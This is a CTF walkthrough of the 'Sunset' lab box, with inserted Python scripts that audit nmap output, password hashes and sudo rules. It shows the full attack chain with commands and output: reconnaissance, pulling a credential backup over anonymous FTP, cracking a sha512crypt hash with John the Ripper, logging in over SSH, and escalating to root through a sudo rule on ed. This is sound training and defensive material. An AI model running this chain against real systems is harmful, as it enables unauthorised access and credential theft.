Sunset is another CTF challenge meant for beginners. The OVA file of the box can be downloaded from this site.
Penetration Testing Methodology
Scanning
- Nmap
Enumeration
- Login through ftp
Exploitation & Privilege escalation
- Connect through ssh
- Exploiting sudo rights
Walkthrough
First we launch Kali Linux and, only after it has completely booted, launch the Sunset box.
Scanning:
Arp-Scan
We use the arp-scan tool to find the target's IP address on the local network.
┌──(root㉿kali)-[/home/kali/Desktop]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:53:0c:ba, IPv4: 192.168.1.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1 3c:46:45:0d:5d:81 Shanghai Infinity Wireless Technologies Co.,Ltd.
192.168.1.2 18:0f:76:c7:66:34 D-Link International
192.168.1.6 94:a6:7e:b3:4f:ca NETGEAR
192.168.1.7 c8:21:58:c7:9f:de Intel Corporate
192.168.1.17 54:14:f3:b3:3b:48 Intel Corporate
192.168.1.94 78:af:08:80:8e:41 Intel Corporate
192.168.1.130 08:00:27:a9:d1:64 PCS Systemtechnik GmbH
15 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.967 seconds (130.15 hosts/sec). 7 responded
In the results, look for a device whose MAC address starts with 08 if using VirtualBox or 00 if using VMware. The corresponding IP is the target IP.
Nmap
Now we scan that IP for open ports, services and versions to gather information about the target. For that we use the nmap tool.
┌──(root㉿kali)-[~]
└─# nmap -A 192.168.1.130 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-22 02:52 EDT
Nmap scan report for 192.168.1.130
Host is up (0.00077s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.5.5
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.1.130:21
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 root root 1062 Jul 29 2019 backup
22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
| 2048 71:bd:fa:c5:8c:88:7c:22:14:c4:20:03:32:36:05:d6 (RSA)
| 256 35:92:8e:16:43:0c:39:88:8e:83:0d:e2:2c:a4:65:91 (ECDSA)
|_ 256 45:c5:40:14:49:cf:80:3c:41:4f:bb:22:6c:80:1e:fe (ED25519)
MAC Address: 08:00:27:A9:D1:64 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.77 ms 192.168.1.130
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.98 seconds
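The two findings that drive the rest of this walkthrough (an FTP service that allows anonymous login and a file already visible in that listing) are both in the nmap script output above. The following Python is an added example, not part of the original post, that parses an nmap -A report into port records and flags those two findings the way a triage script would; the sample input is an excerpt of the report above, embedded so it runs offline.

```python
import re

# Excerpt of the nmap -A output shown above, embedded as the sample input so the
# example runs offline (port and script lines copied, the rest of the report omitted).
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.5.5
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.1.130:21
| Waiting for username.
|_End of status.
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 root root 1062 Jul 29 2019 backup
22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
| 2048 71:bd:fa:c5:8c:88:7c:22:14:c4:20:03:32:36:05:d6 (RSA)
|_ 256 45:c5:40:14:49:cf:80:3c:41:4f:bb:22:6c:80:1e:fe (ED25519)
MAC Address: 08:00:27:A9:D1:64 (Oracle VirtualBox virtual NIC)
"""

# One port line: "<port>/<proto> <state> <service> [<version ...>]"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# A Unix-style directory listing line, as the ftp-anon script prints it
LISTING_RE = re.compile(r"^[-d][rwxsStT-]{9}\s")


def parse_ports(text):
    """Return one dict per port line, with the NSE script output lines that
    follow it ('|' and '|_' prefixed) attached under 'scripts'."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({
                "port": int(m.group(1)),
                "proto": m.group(2),
                "state": m.group(3),
                "service": m.group(4),
                "version": m.group(5).strip(),
                "scripts": [],
            })
        elif line.startswith("|") and ports:
            # strip the "| " / "|_ " tree prefix nmap draws in front of script output
            ports[-1]["scripts"].append(line.lstrip("|_ ").rstrip())
    return ports


def triage(ports):
    """Flag the findings a defender would act on first: anonymous FTP access
    and any file the anonymous listing already exposes."""
    findings = []
    for p in ports:
        if p["state"] != "open":
            continue
        for s in p["scripts"]:
            if s.startswith("ftp-anon:") and "Anonymous FTP login allowed" in s:
                findings.append((p["port"], "anonymous FTP login allowed"))
            elif LISTING_RE.match(s):
                findings.append((p["port"], "file readable by anonymous users: " + s.split()[-1]))
    return findings


if __name__ == "__main__":
    for port, issue in triage(parse_ports(NMAP_OUTPUT)):
        print(f"{port}/tcp: {issue}")
```

The parser keys only on the column layout nmap prints by default, so it works on a saved `-oN` file as well as on pasted output; the same listing check would also catch world-readable files that a misconfigured FTP server exposes in an environment you are responsible for.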
Enumeration:
FTP
We can now try to access it through the FTP port.
┌──(root㉿kali)-[/home/kali/Desktop]
└─# ftp 192.168.1.130
Connected to 192.168.1.130.
220 pyftpdlib 1.5.5 ready.
Name (192.168.1.130:kali): anonymous
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering extended passive mode (|||46071|).
125 Data connection already open. Transfer starting.
-rw-r--r-- 1 root root 1062 Jul 29 2019 backup
226 Transfer complete.
ftp> get backup
local: backup remote: backup
229 Entering extended passive mode (|||37077|).
125 Data connection already open. Transfer starting.
100% |***********************************************************************************************************************************************************************************************| 1062 405.43 KiB/s 00:00 ETA
226 Transfer complete.
1062 bytes received in 00:00 (337.93 KiB/s)
ftp> exit
221 Goodbye.
To log in to the FTP server we used the name anonymous and the password anonymous.
This works because the nmap scan had already shown that anonymous FTP login is allowed.
Then we use the ls command to see which files are available there.
We find a file named backup.
We cannot use the cat command within an ftp session, so we use get backup to transfer the file to our own system.
Then we end the ftp session with exit.
Back in our own terminal we view the contents of the backup file with the command cat backup.
┌──(root㉿kali)-[/home/kali/Desktop]
└─# cat backup
CREDENTIALS:
office:$6$$9ZYTy.VI0M7cG9tVcPl.QZZi2XHOUZ9hLsiCr/avWTajSPHqws7.75I9ZjP4HwLN3Gvio5To4gjBdeDGzhq.X.
datacenter:$6$$3QW/J4OlV3naFDbhuksxRXLrkR6iKo4gh.Zx1RfZC2OINKMiJ/6Ffyl33OFtBvCI7S4N1b8vlDylF2hG2N0NN/
sky:$6$$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0
sunset:$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/
space:$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/
Now we have some credentials, but the passwords are stored as hashes.
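The hash strings themselves say a lot before any cracking starts: the $6$ prefix is sha512crypt, the field between the second and third $ is the salt, and when no rounds= parameter is present the cost is the default 5000 iterations (which is where john's "Cost 1 (iteration count) is 5000" line comes from). Four of the five entries in the backup file carry an empty salt. The following Python is an added example, not part of the original post: it parses modular-crypt entries of the form user:$id$[rounds=N$]salt$digest and reports the weaknesses visible from the strings alone, using the contents of the backup file above as its embedded sample input.

```python
# The contents of the backup file retrieved over FTP above, embedded here as
# the sample input so the example runs offline.
BACKUP = """\
CREDENTIALS:
office:$6$$9ZYTy.VI0M7cG9tVcPl.QZZi2XHOUZ9hLsiCr/avWTajSPHqws7.75I9ZjP4HwLN3Gvio5To4gjBdeDGzhq.X.
datacenter:$6$$3QW/J4OlV3naFDbhuksxRXLrkR6iKo4gh.Zx1RfZC2OINKMiJ/6Ffyl33OFtBvCI7S4N1b8vlDylF2hG2N0NN/
sky:$6$$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0
sunset:$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/
space:$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/
"""

# Modular-crypt method ids that use the layout "$id$[rounds=N$]salt$digest"
CRYPT_METHODS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt"}
DIGEST_LEN = {"1": 22, "5": 43, "6": 86}            # length of the base64-style digest
DEFAULT_ROUNDS = {"1": 1000, "5": 5000, "6": 5000}  # md5crypt is fixed at 1000


def parse_crypt_entry(line):
    """Parse one 'user:$id$[rounds=N$]salt$digest' line into its fields.
    Returns None for lines without a modular-crypt hash (e.g. the header)."""
    user, sep, field = line.strip().partition(":")
    if not sep or not field.startswith("$"):
        return None
    parts = field.split("$")          # ['', id, (rounds=N,) salt, digest]
    ident, rest = parts[1], parts[2:]
    if ident not in CRYPT_METHODS:
        return {"user": user, "id": ident, "method": "unknown",
                "rounds": None, "salt": None, "digest": None}
    rounds = DEFAULT_ROUNDS[ident]
    if rest and rest[0].startswith("rounds="):
        rounds = int(rest[0][len("rounds="):])
        rest = rest[1:]
    return {"user": user, "id": ident, "method": CRYPT_METHODS[ident],
            "rounds": rounds,
            "salt": rest[0] if rest else "",
            "digest": rest[1] if len(rest) > 1 else ""}


def audit_credentials(text):
    """Report, per user, the weaknesses visible from the hash string alone."""
    findings = []
    for line in text.splitlines():
        e = parse_crypt_entry(line)
        if e is None:
            continue
        if e["method"] == "unknown":
            findings.append((e["user"], f"unrecognised method id ${e['id']}$"))
            continue
        if e["salt"] == "":
            # No salt: equal passwords give equal hashes, and a precomputed
            # table for this method applies to every entry at once.
            findings.append((e["user"], "empty salt"))
        if len(e["digest"]) != DIGEST_LEN[e["id"]]:
            findings.append((e["user"], "digest length does not match the method"))
        if e["id"] in ("5", "6") and e["rounds"] < DEFAULT_ROUNDS[e["id"]]:
            findings.append((e["user"], f"only {e['rounds']} rounds"))
    return findings


if __name__ == "__main__":
    for user, issue in audit_credentials(BACKUP):
        print(f"{user}: {issue}")
```

Run against the file it reports "empty salt" for office, datacenter, sky and space and nothing for sunset, whose entry has a 16-character salt and the default 5000 rounds. The digest-length check is there because a copied hash with a missing or extra character will not crack and will not verify, which is worth knowing before spending an hour of CPU on it.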
John The Ripper
To crack the hashes we use a tool called John the Ripper. First we copy the hash of the user sunset from the credentials into a new file with a name of our own choice; here the file is named sunset. The command to crack the hash is then simply john sunset (note that sunset here is the name of the file we created), which is enough at least in this box's case.
┌──(root㉿kali)-[/home/kali/Desktop]
└─# john sunset
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Proceeding with incremental:ASCII
cheer14 (?)
1g 0:00:01:33 DONE 3/3 (2023-09-22 03:34) 0.01075g/s 3472p/s 3472c/s 3472C/s secrina..cariell
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
The result is cheer14, which is the password of the user sunset.
Exploitation & Privilege escalation:
SSH
Now we start a secure shell session to access the target system. The command is
ssh username@targetIP
After successfully logging in to the target system as the user sunset,
list the files in the home directory to find user.txt, and cat that file to get the user flag.
┌──(root㉿kali)-[/home/kali/Desktop]
└─# ssh sunset@192.168.1.130
The authenticity of host '192.168.1.130 (192.168.1.130)' can't be established.
ED25519 key fingerprint is SHA256:eJPU2yXc6mt/1NYIC1rQJ8kyxsVoxaIPzkeJqovAOy.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.130' (ED25519) to the list of known hosts.
sunset@192.168.18.140's password:
Linux sunset 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5+deb10u1 (2019-07-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
Last login: Sun Jul 28 20:52:38 2019 from 192.168.1.130
sunset@sunset:~$ ls
user.txt
sunset@sunset:~$ cat user.txt
5b5b8e9b01ef27a1cc0a2d5fa87d7190
sunset@sunset:~$
Now we need to find the root flag too. It is generally in the /root directory, so we try to cd to /root.
We don't have permission. So we check the sudo rights with sudo -l, and see that the user sunset is allowed to run /usr/bin/ed through sudo.
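A sudo rule that lets an unprivileged user run an interactive editor as root is the whole privilege escalation here, and it is exactly the kind of entry a sudoers review should catch before a CTF player does. The following Python is an added example, not part of the original post: it parses the layout of sudo -l output into rules and flags the ones that grant root either outright or through a program that can spawn a shell. The sample output is constructed (the walkthrough does not reproduce the box's real sudo -l output) and the SHELL_CAPABLE set contains only /usr/bin/ed, the program this walkthrough identifies; a real audit would extend it from the GTFOBins sudo section.

```python
import re

# Constructed sample of `sudo -l` output for the sunset user, in the layout
# sudo prints; the walkthrough does not reproduce the box's real output.
SUDO_L = """\
Matching Defaults entries for sunset on sunset:
    env_reset, mail_badpass

User sunset may run the following commands on sunset:
    (root) NOPASSWD: /usr/bin/ed
"""

# Programs that can hand a sudo-granted root context back to the caller.
# Only the one this walkthrough identifies is listed (assumption: extend it
# from the GTFOBins sudo section for a real review).
SHELL_CAPABLE = {"/usr/bin/ed"}

# "(runas_user : runas_group) TAG: TAG: command, command"
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*(.*)$")
TAG_RE = re.compile(r"^(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|"
                    r"LOG_INPUT|NOLOG_INPUT|LOG_OUTPUT|NOLOG_OUTPUT):\s*")


def parse_sudo_l(text):
    """Return the rules under 'may run the following commands' as dicts with
    the run-as user, the tags (e.g. NOPASSWD) and the command."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group(1).split(":")[0].strip()   # "(root)" or "(ALL : ALL)"
        rest = m.group(2)
        tags = set()
        while (t := TAG_RE.match(rest)):
            tags.add(t.group(1))
            rest = rest[t.end():]
        for cmd in rest.split(","):
            rules.append({"runas": runas, "tags": set(tags), "command": cmd.strip()})
    return rules


def audit_sudo_rules(rules):
    """Flag rules that give the caller root outright or via a program that can
    spawn a shell; note whether a password is even required."""
    findings = []
    for r in rules:
        if r["runas"] not in ("root", "ALL"):
            continue
        program = r["command"].split()[0] if r["command"] else ""
        if r["command"] == "ALL":
            findings.append((r["command"], "unrestricted root sudo"))
        elif program in SHELL_CAPABLE:
            reason = "root sudo on a program that can spawn a shell"
            if "NOPASSWD" in r["tags"]:
                reason += " (no password required)"
            findings.append((r["command"], reason))
    return findings


if __name__ == "__main__":
    for command, reason in audit_sudo_rules(parse_sudo_l(SUDO_L)):
        print(f"{command}: {reason}")
```

The fix on the defending side is the usual one: grant the specific non-interactive command the user actually needs rather than an editor, and keep NOPASSWD off anything that can reach a shell.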
GTFOBins
Search for ed on the GTFOBins site.
Select the sudo function.
Copy that code and paste it into the sunset SSH session to finally become root. Then simply cd to the /root directory and ls to see that there is a flag.txt, which is the root flag.
Completed it!
If you struggle during an attempt to root a box, don’t give up! Otherwise, you’ll never know the feeling when you got a root shell after many hours, days or even weeks worth of effort!
BYE :)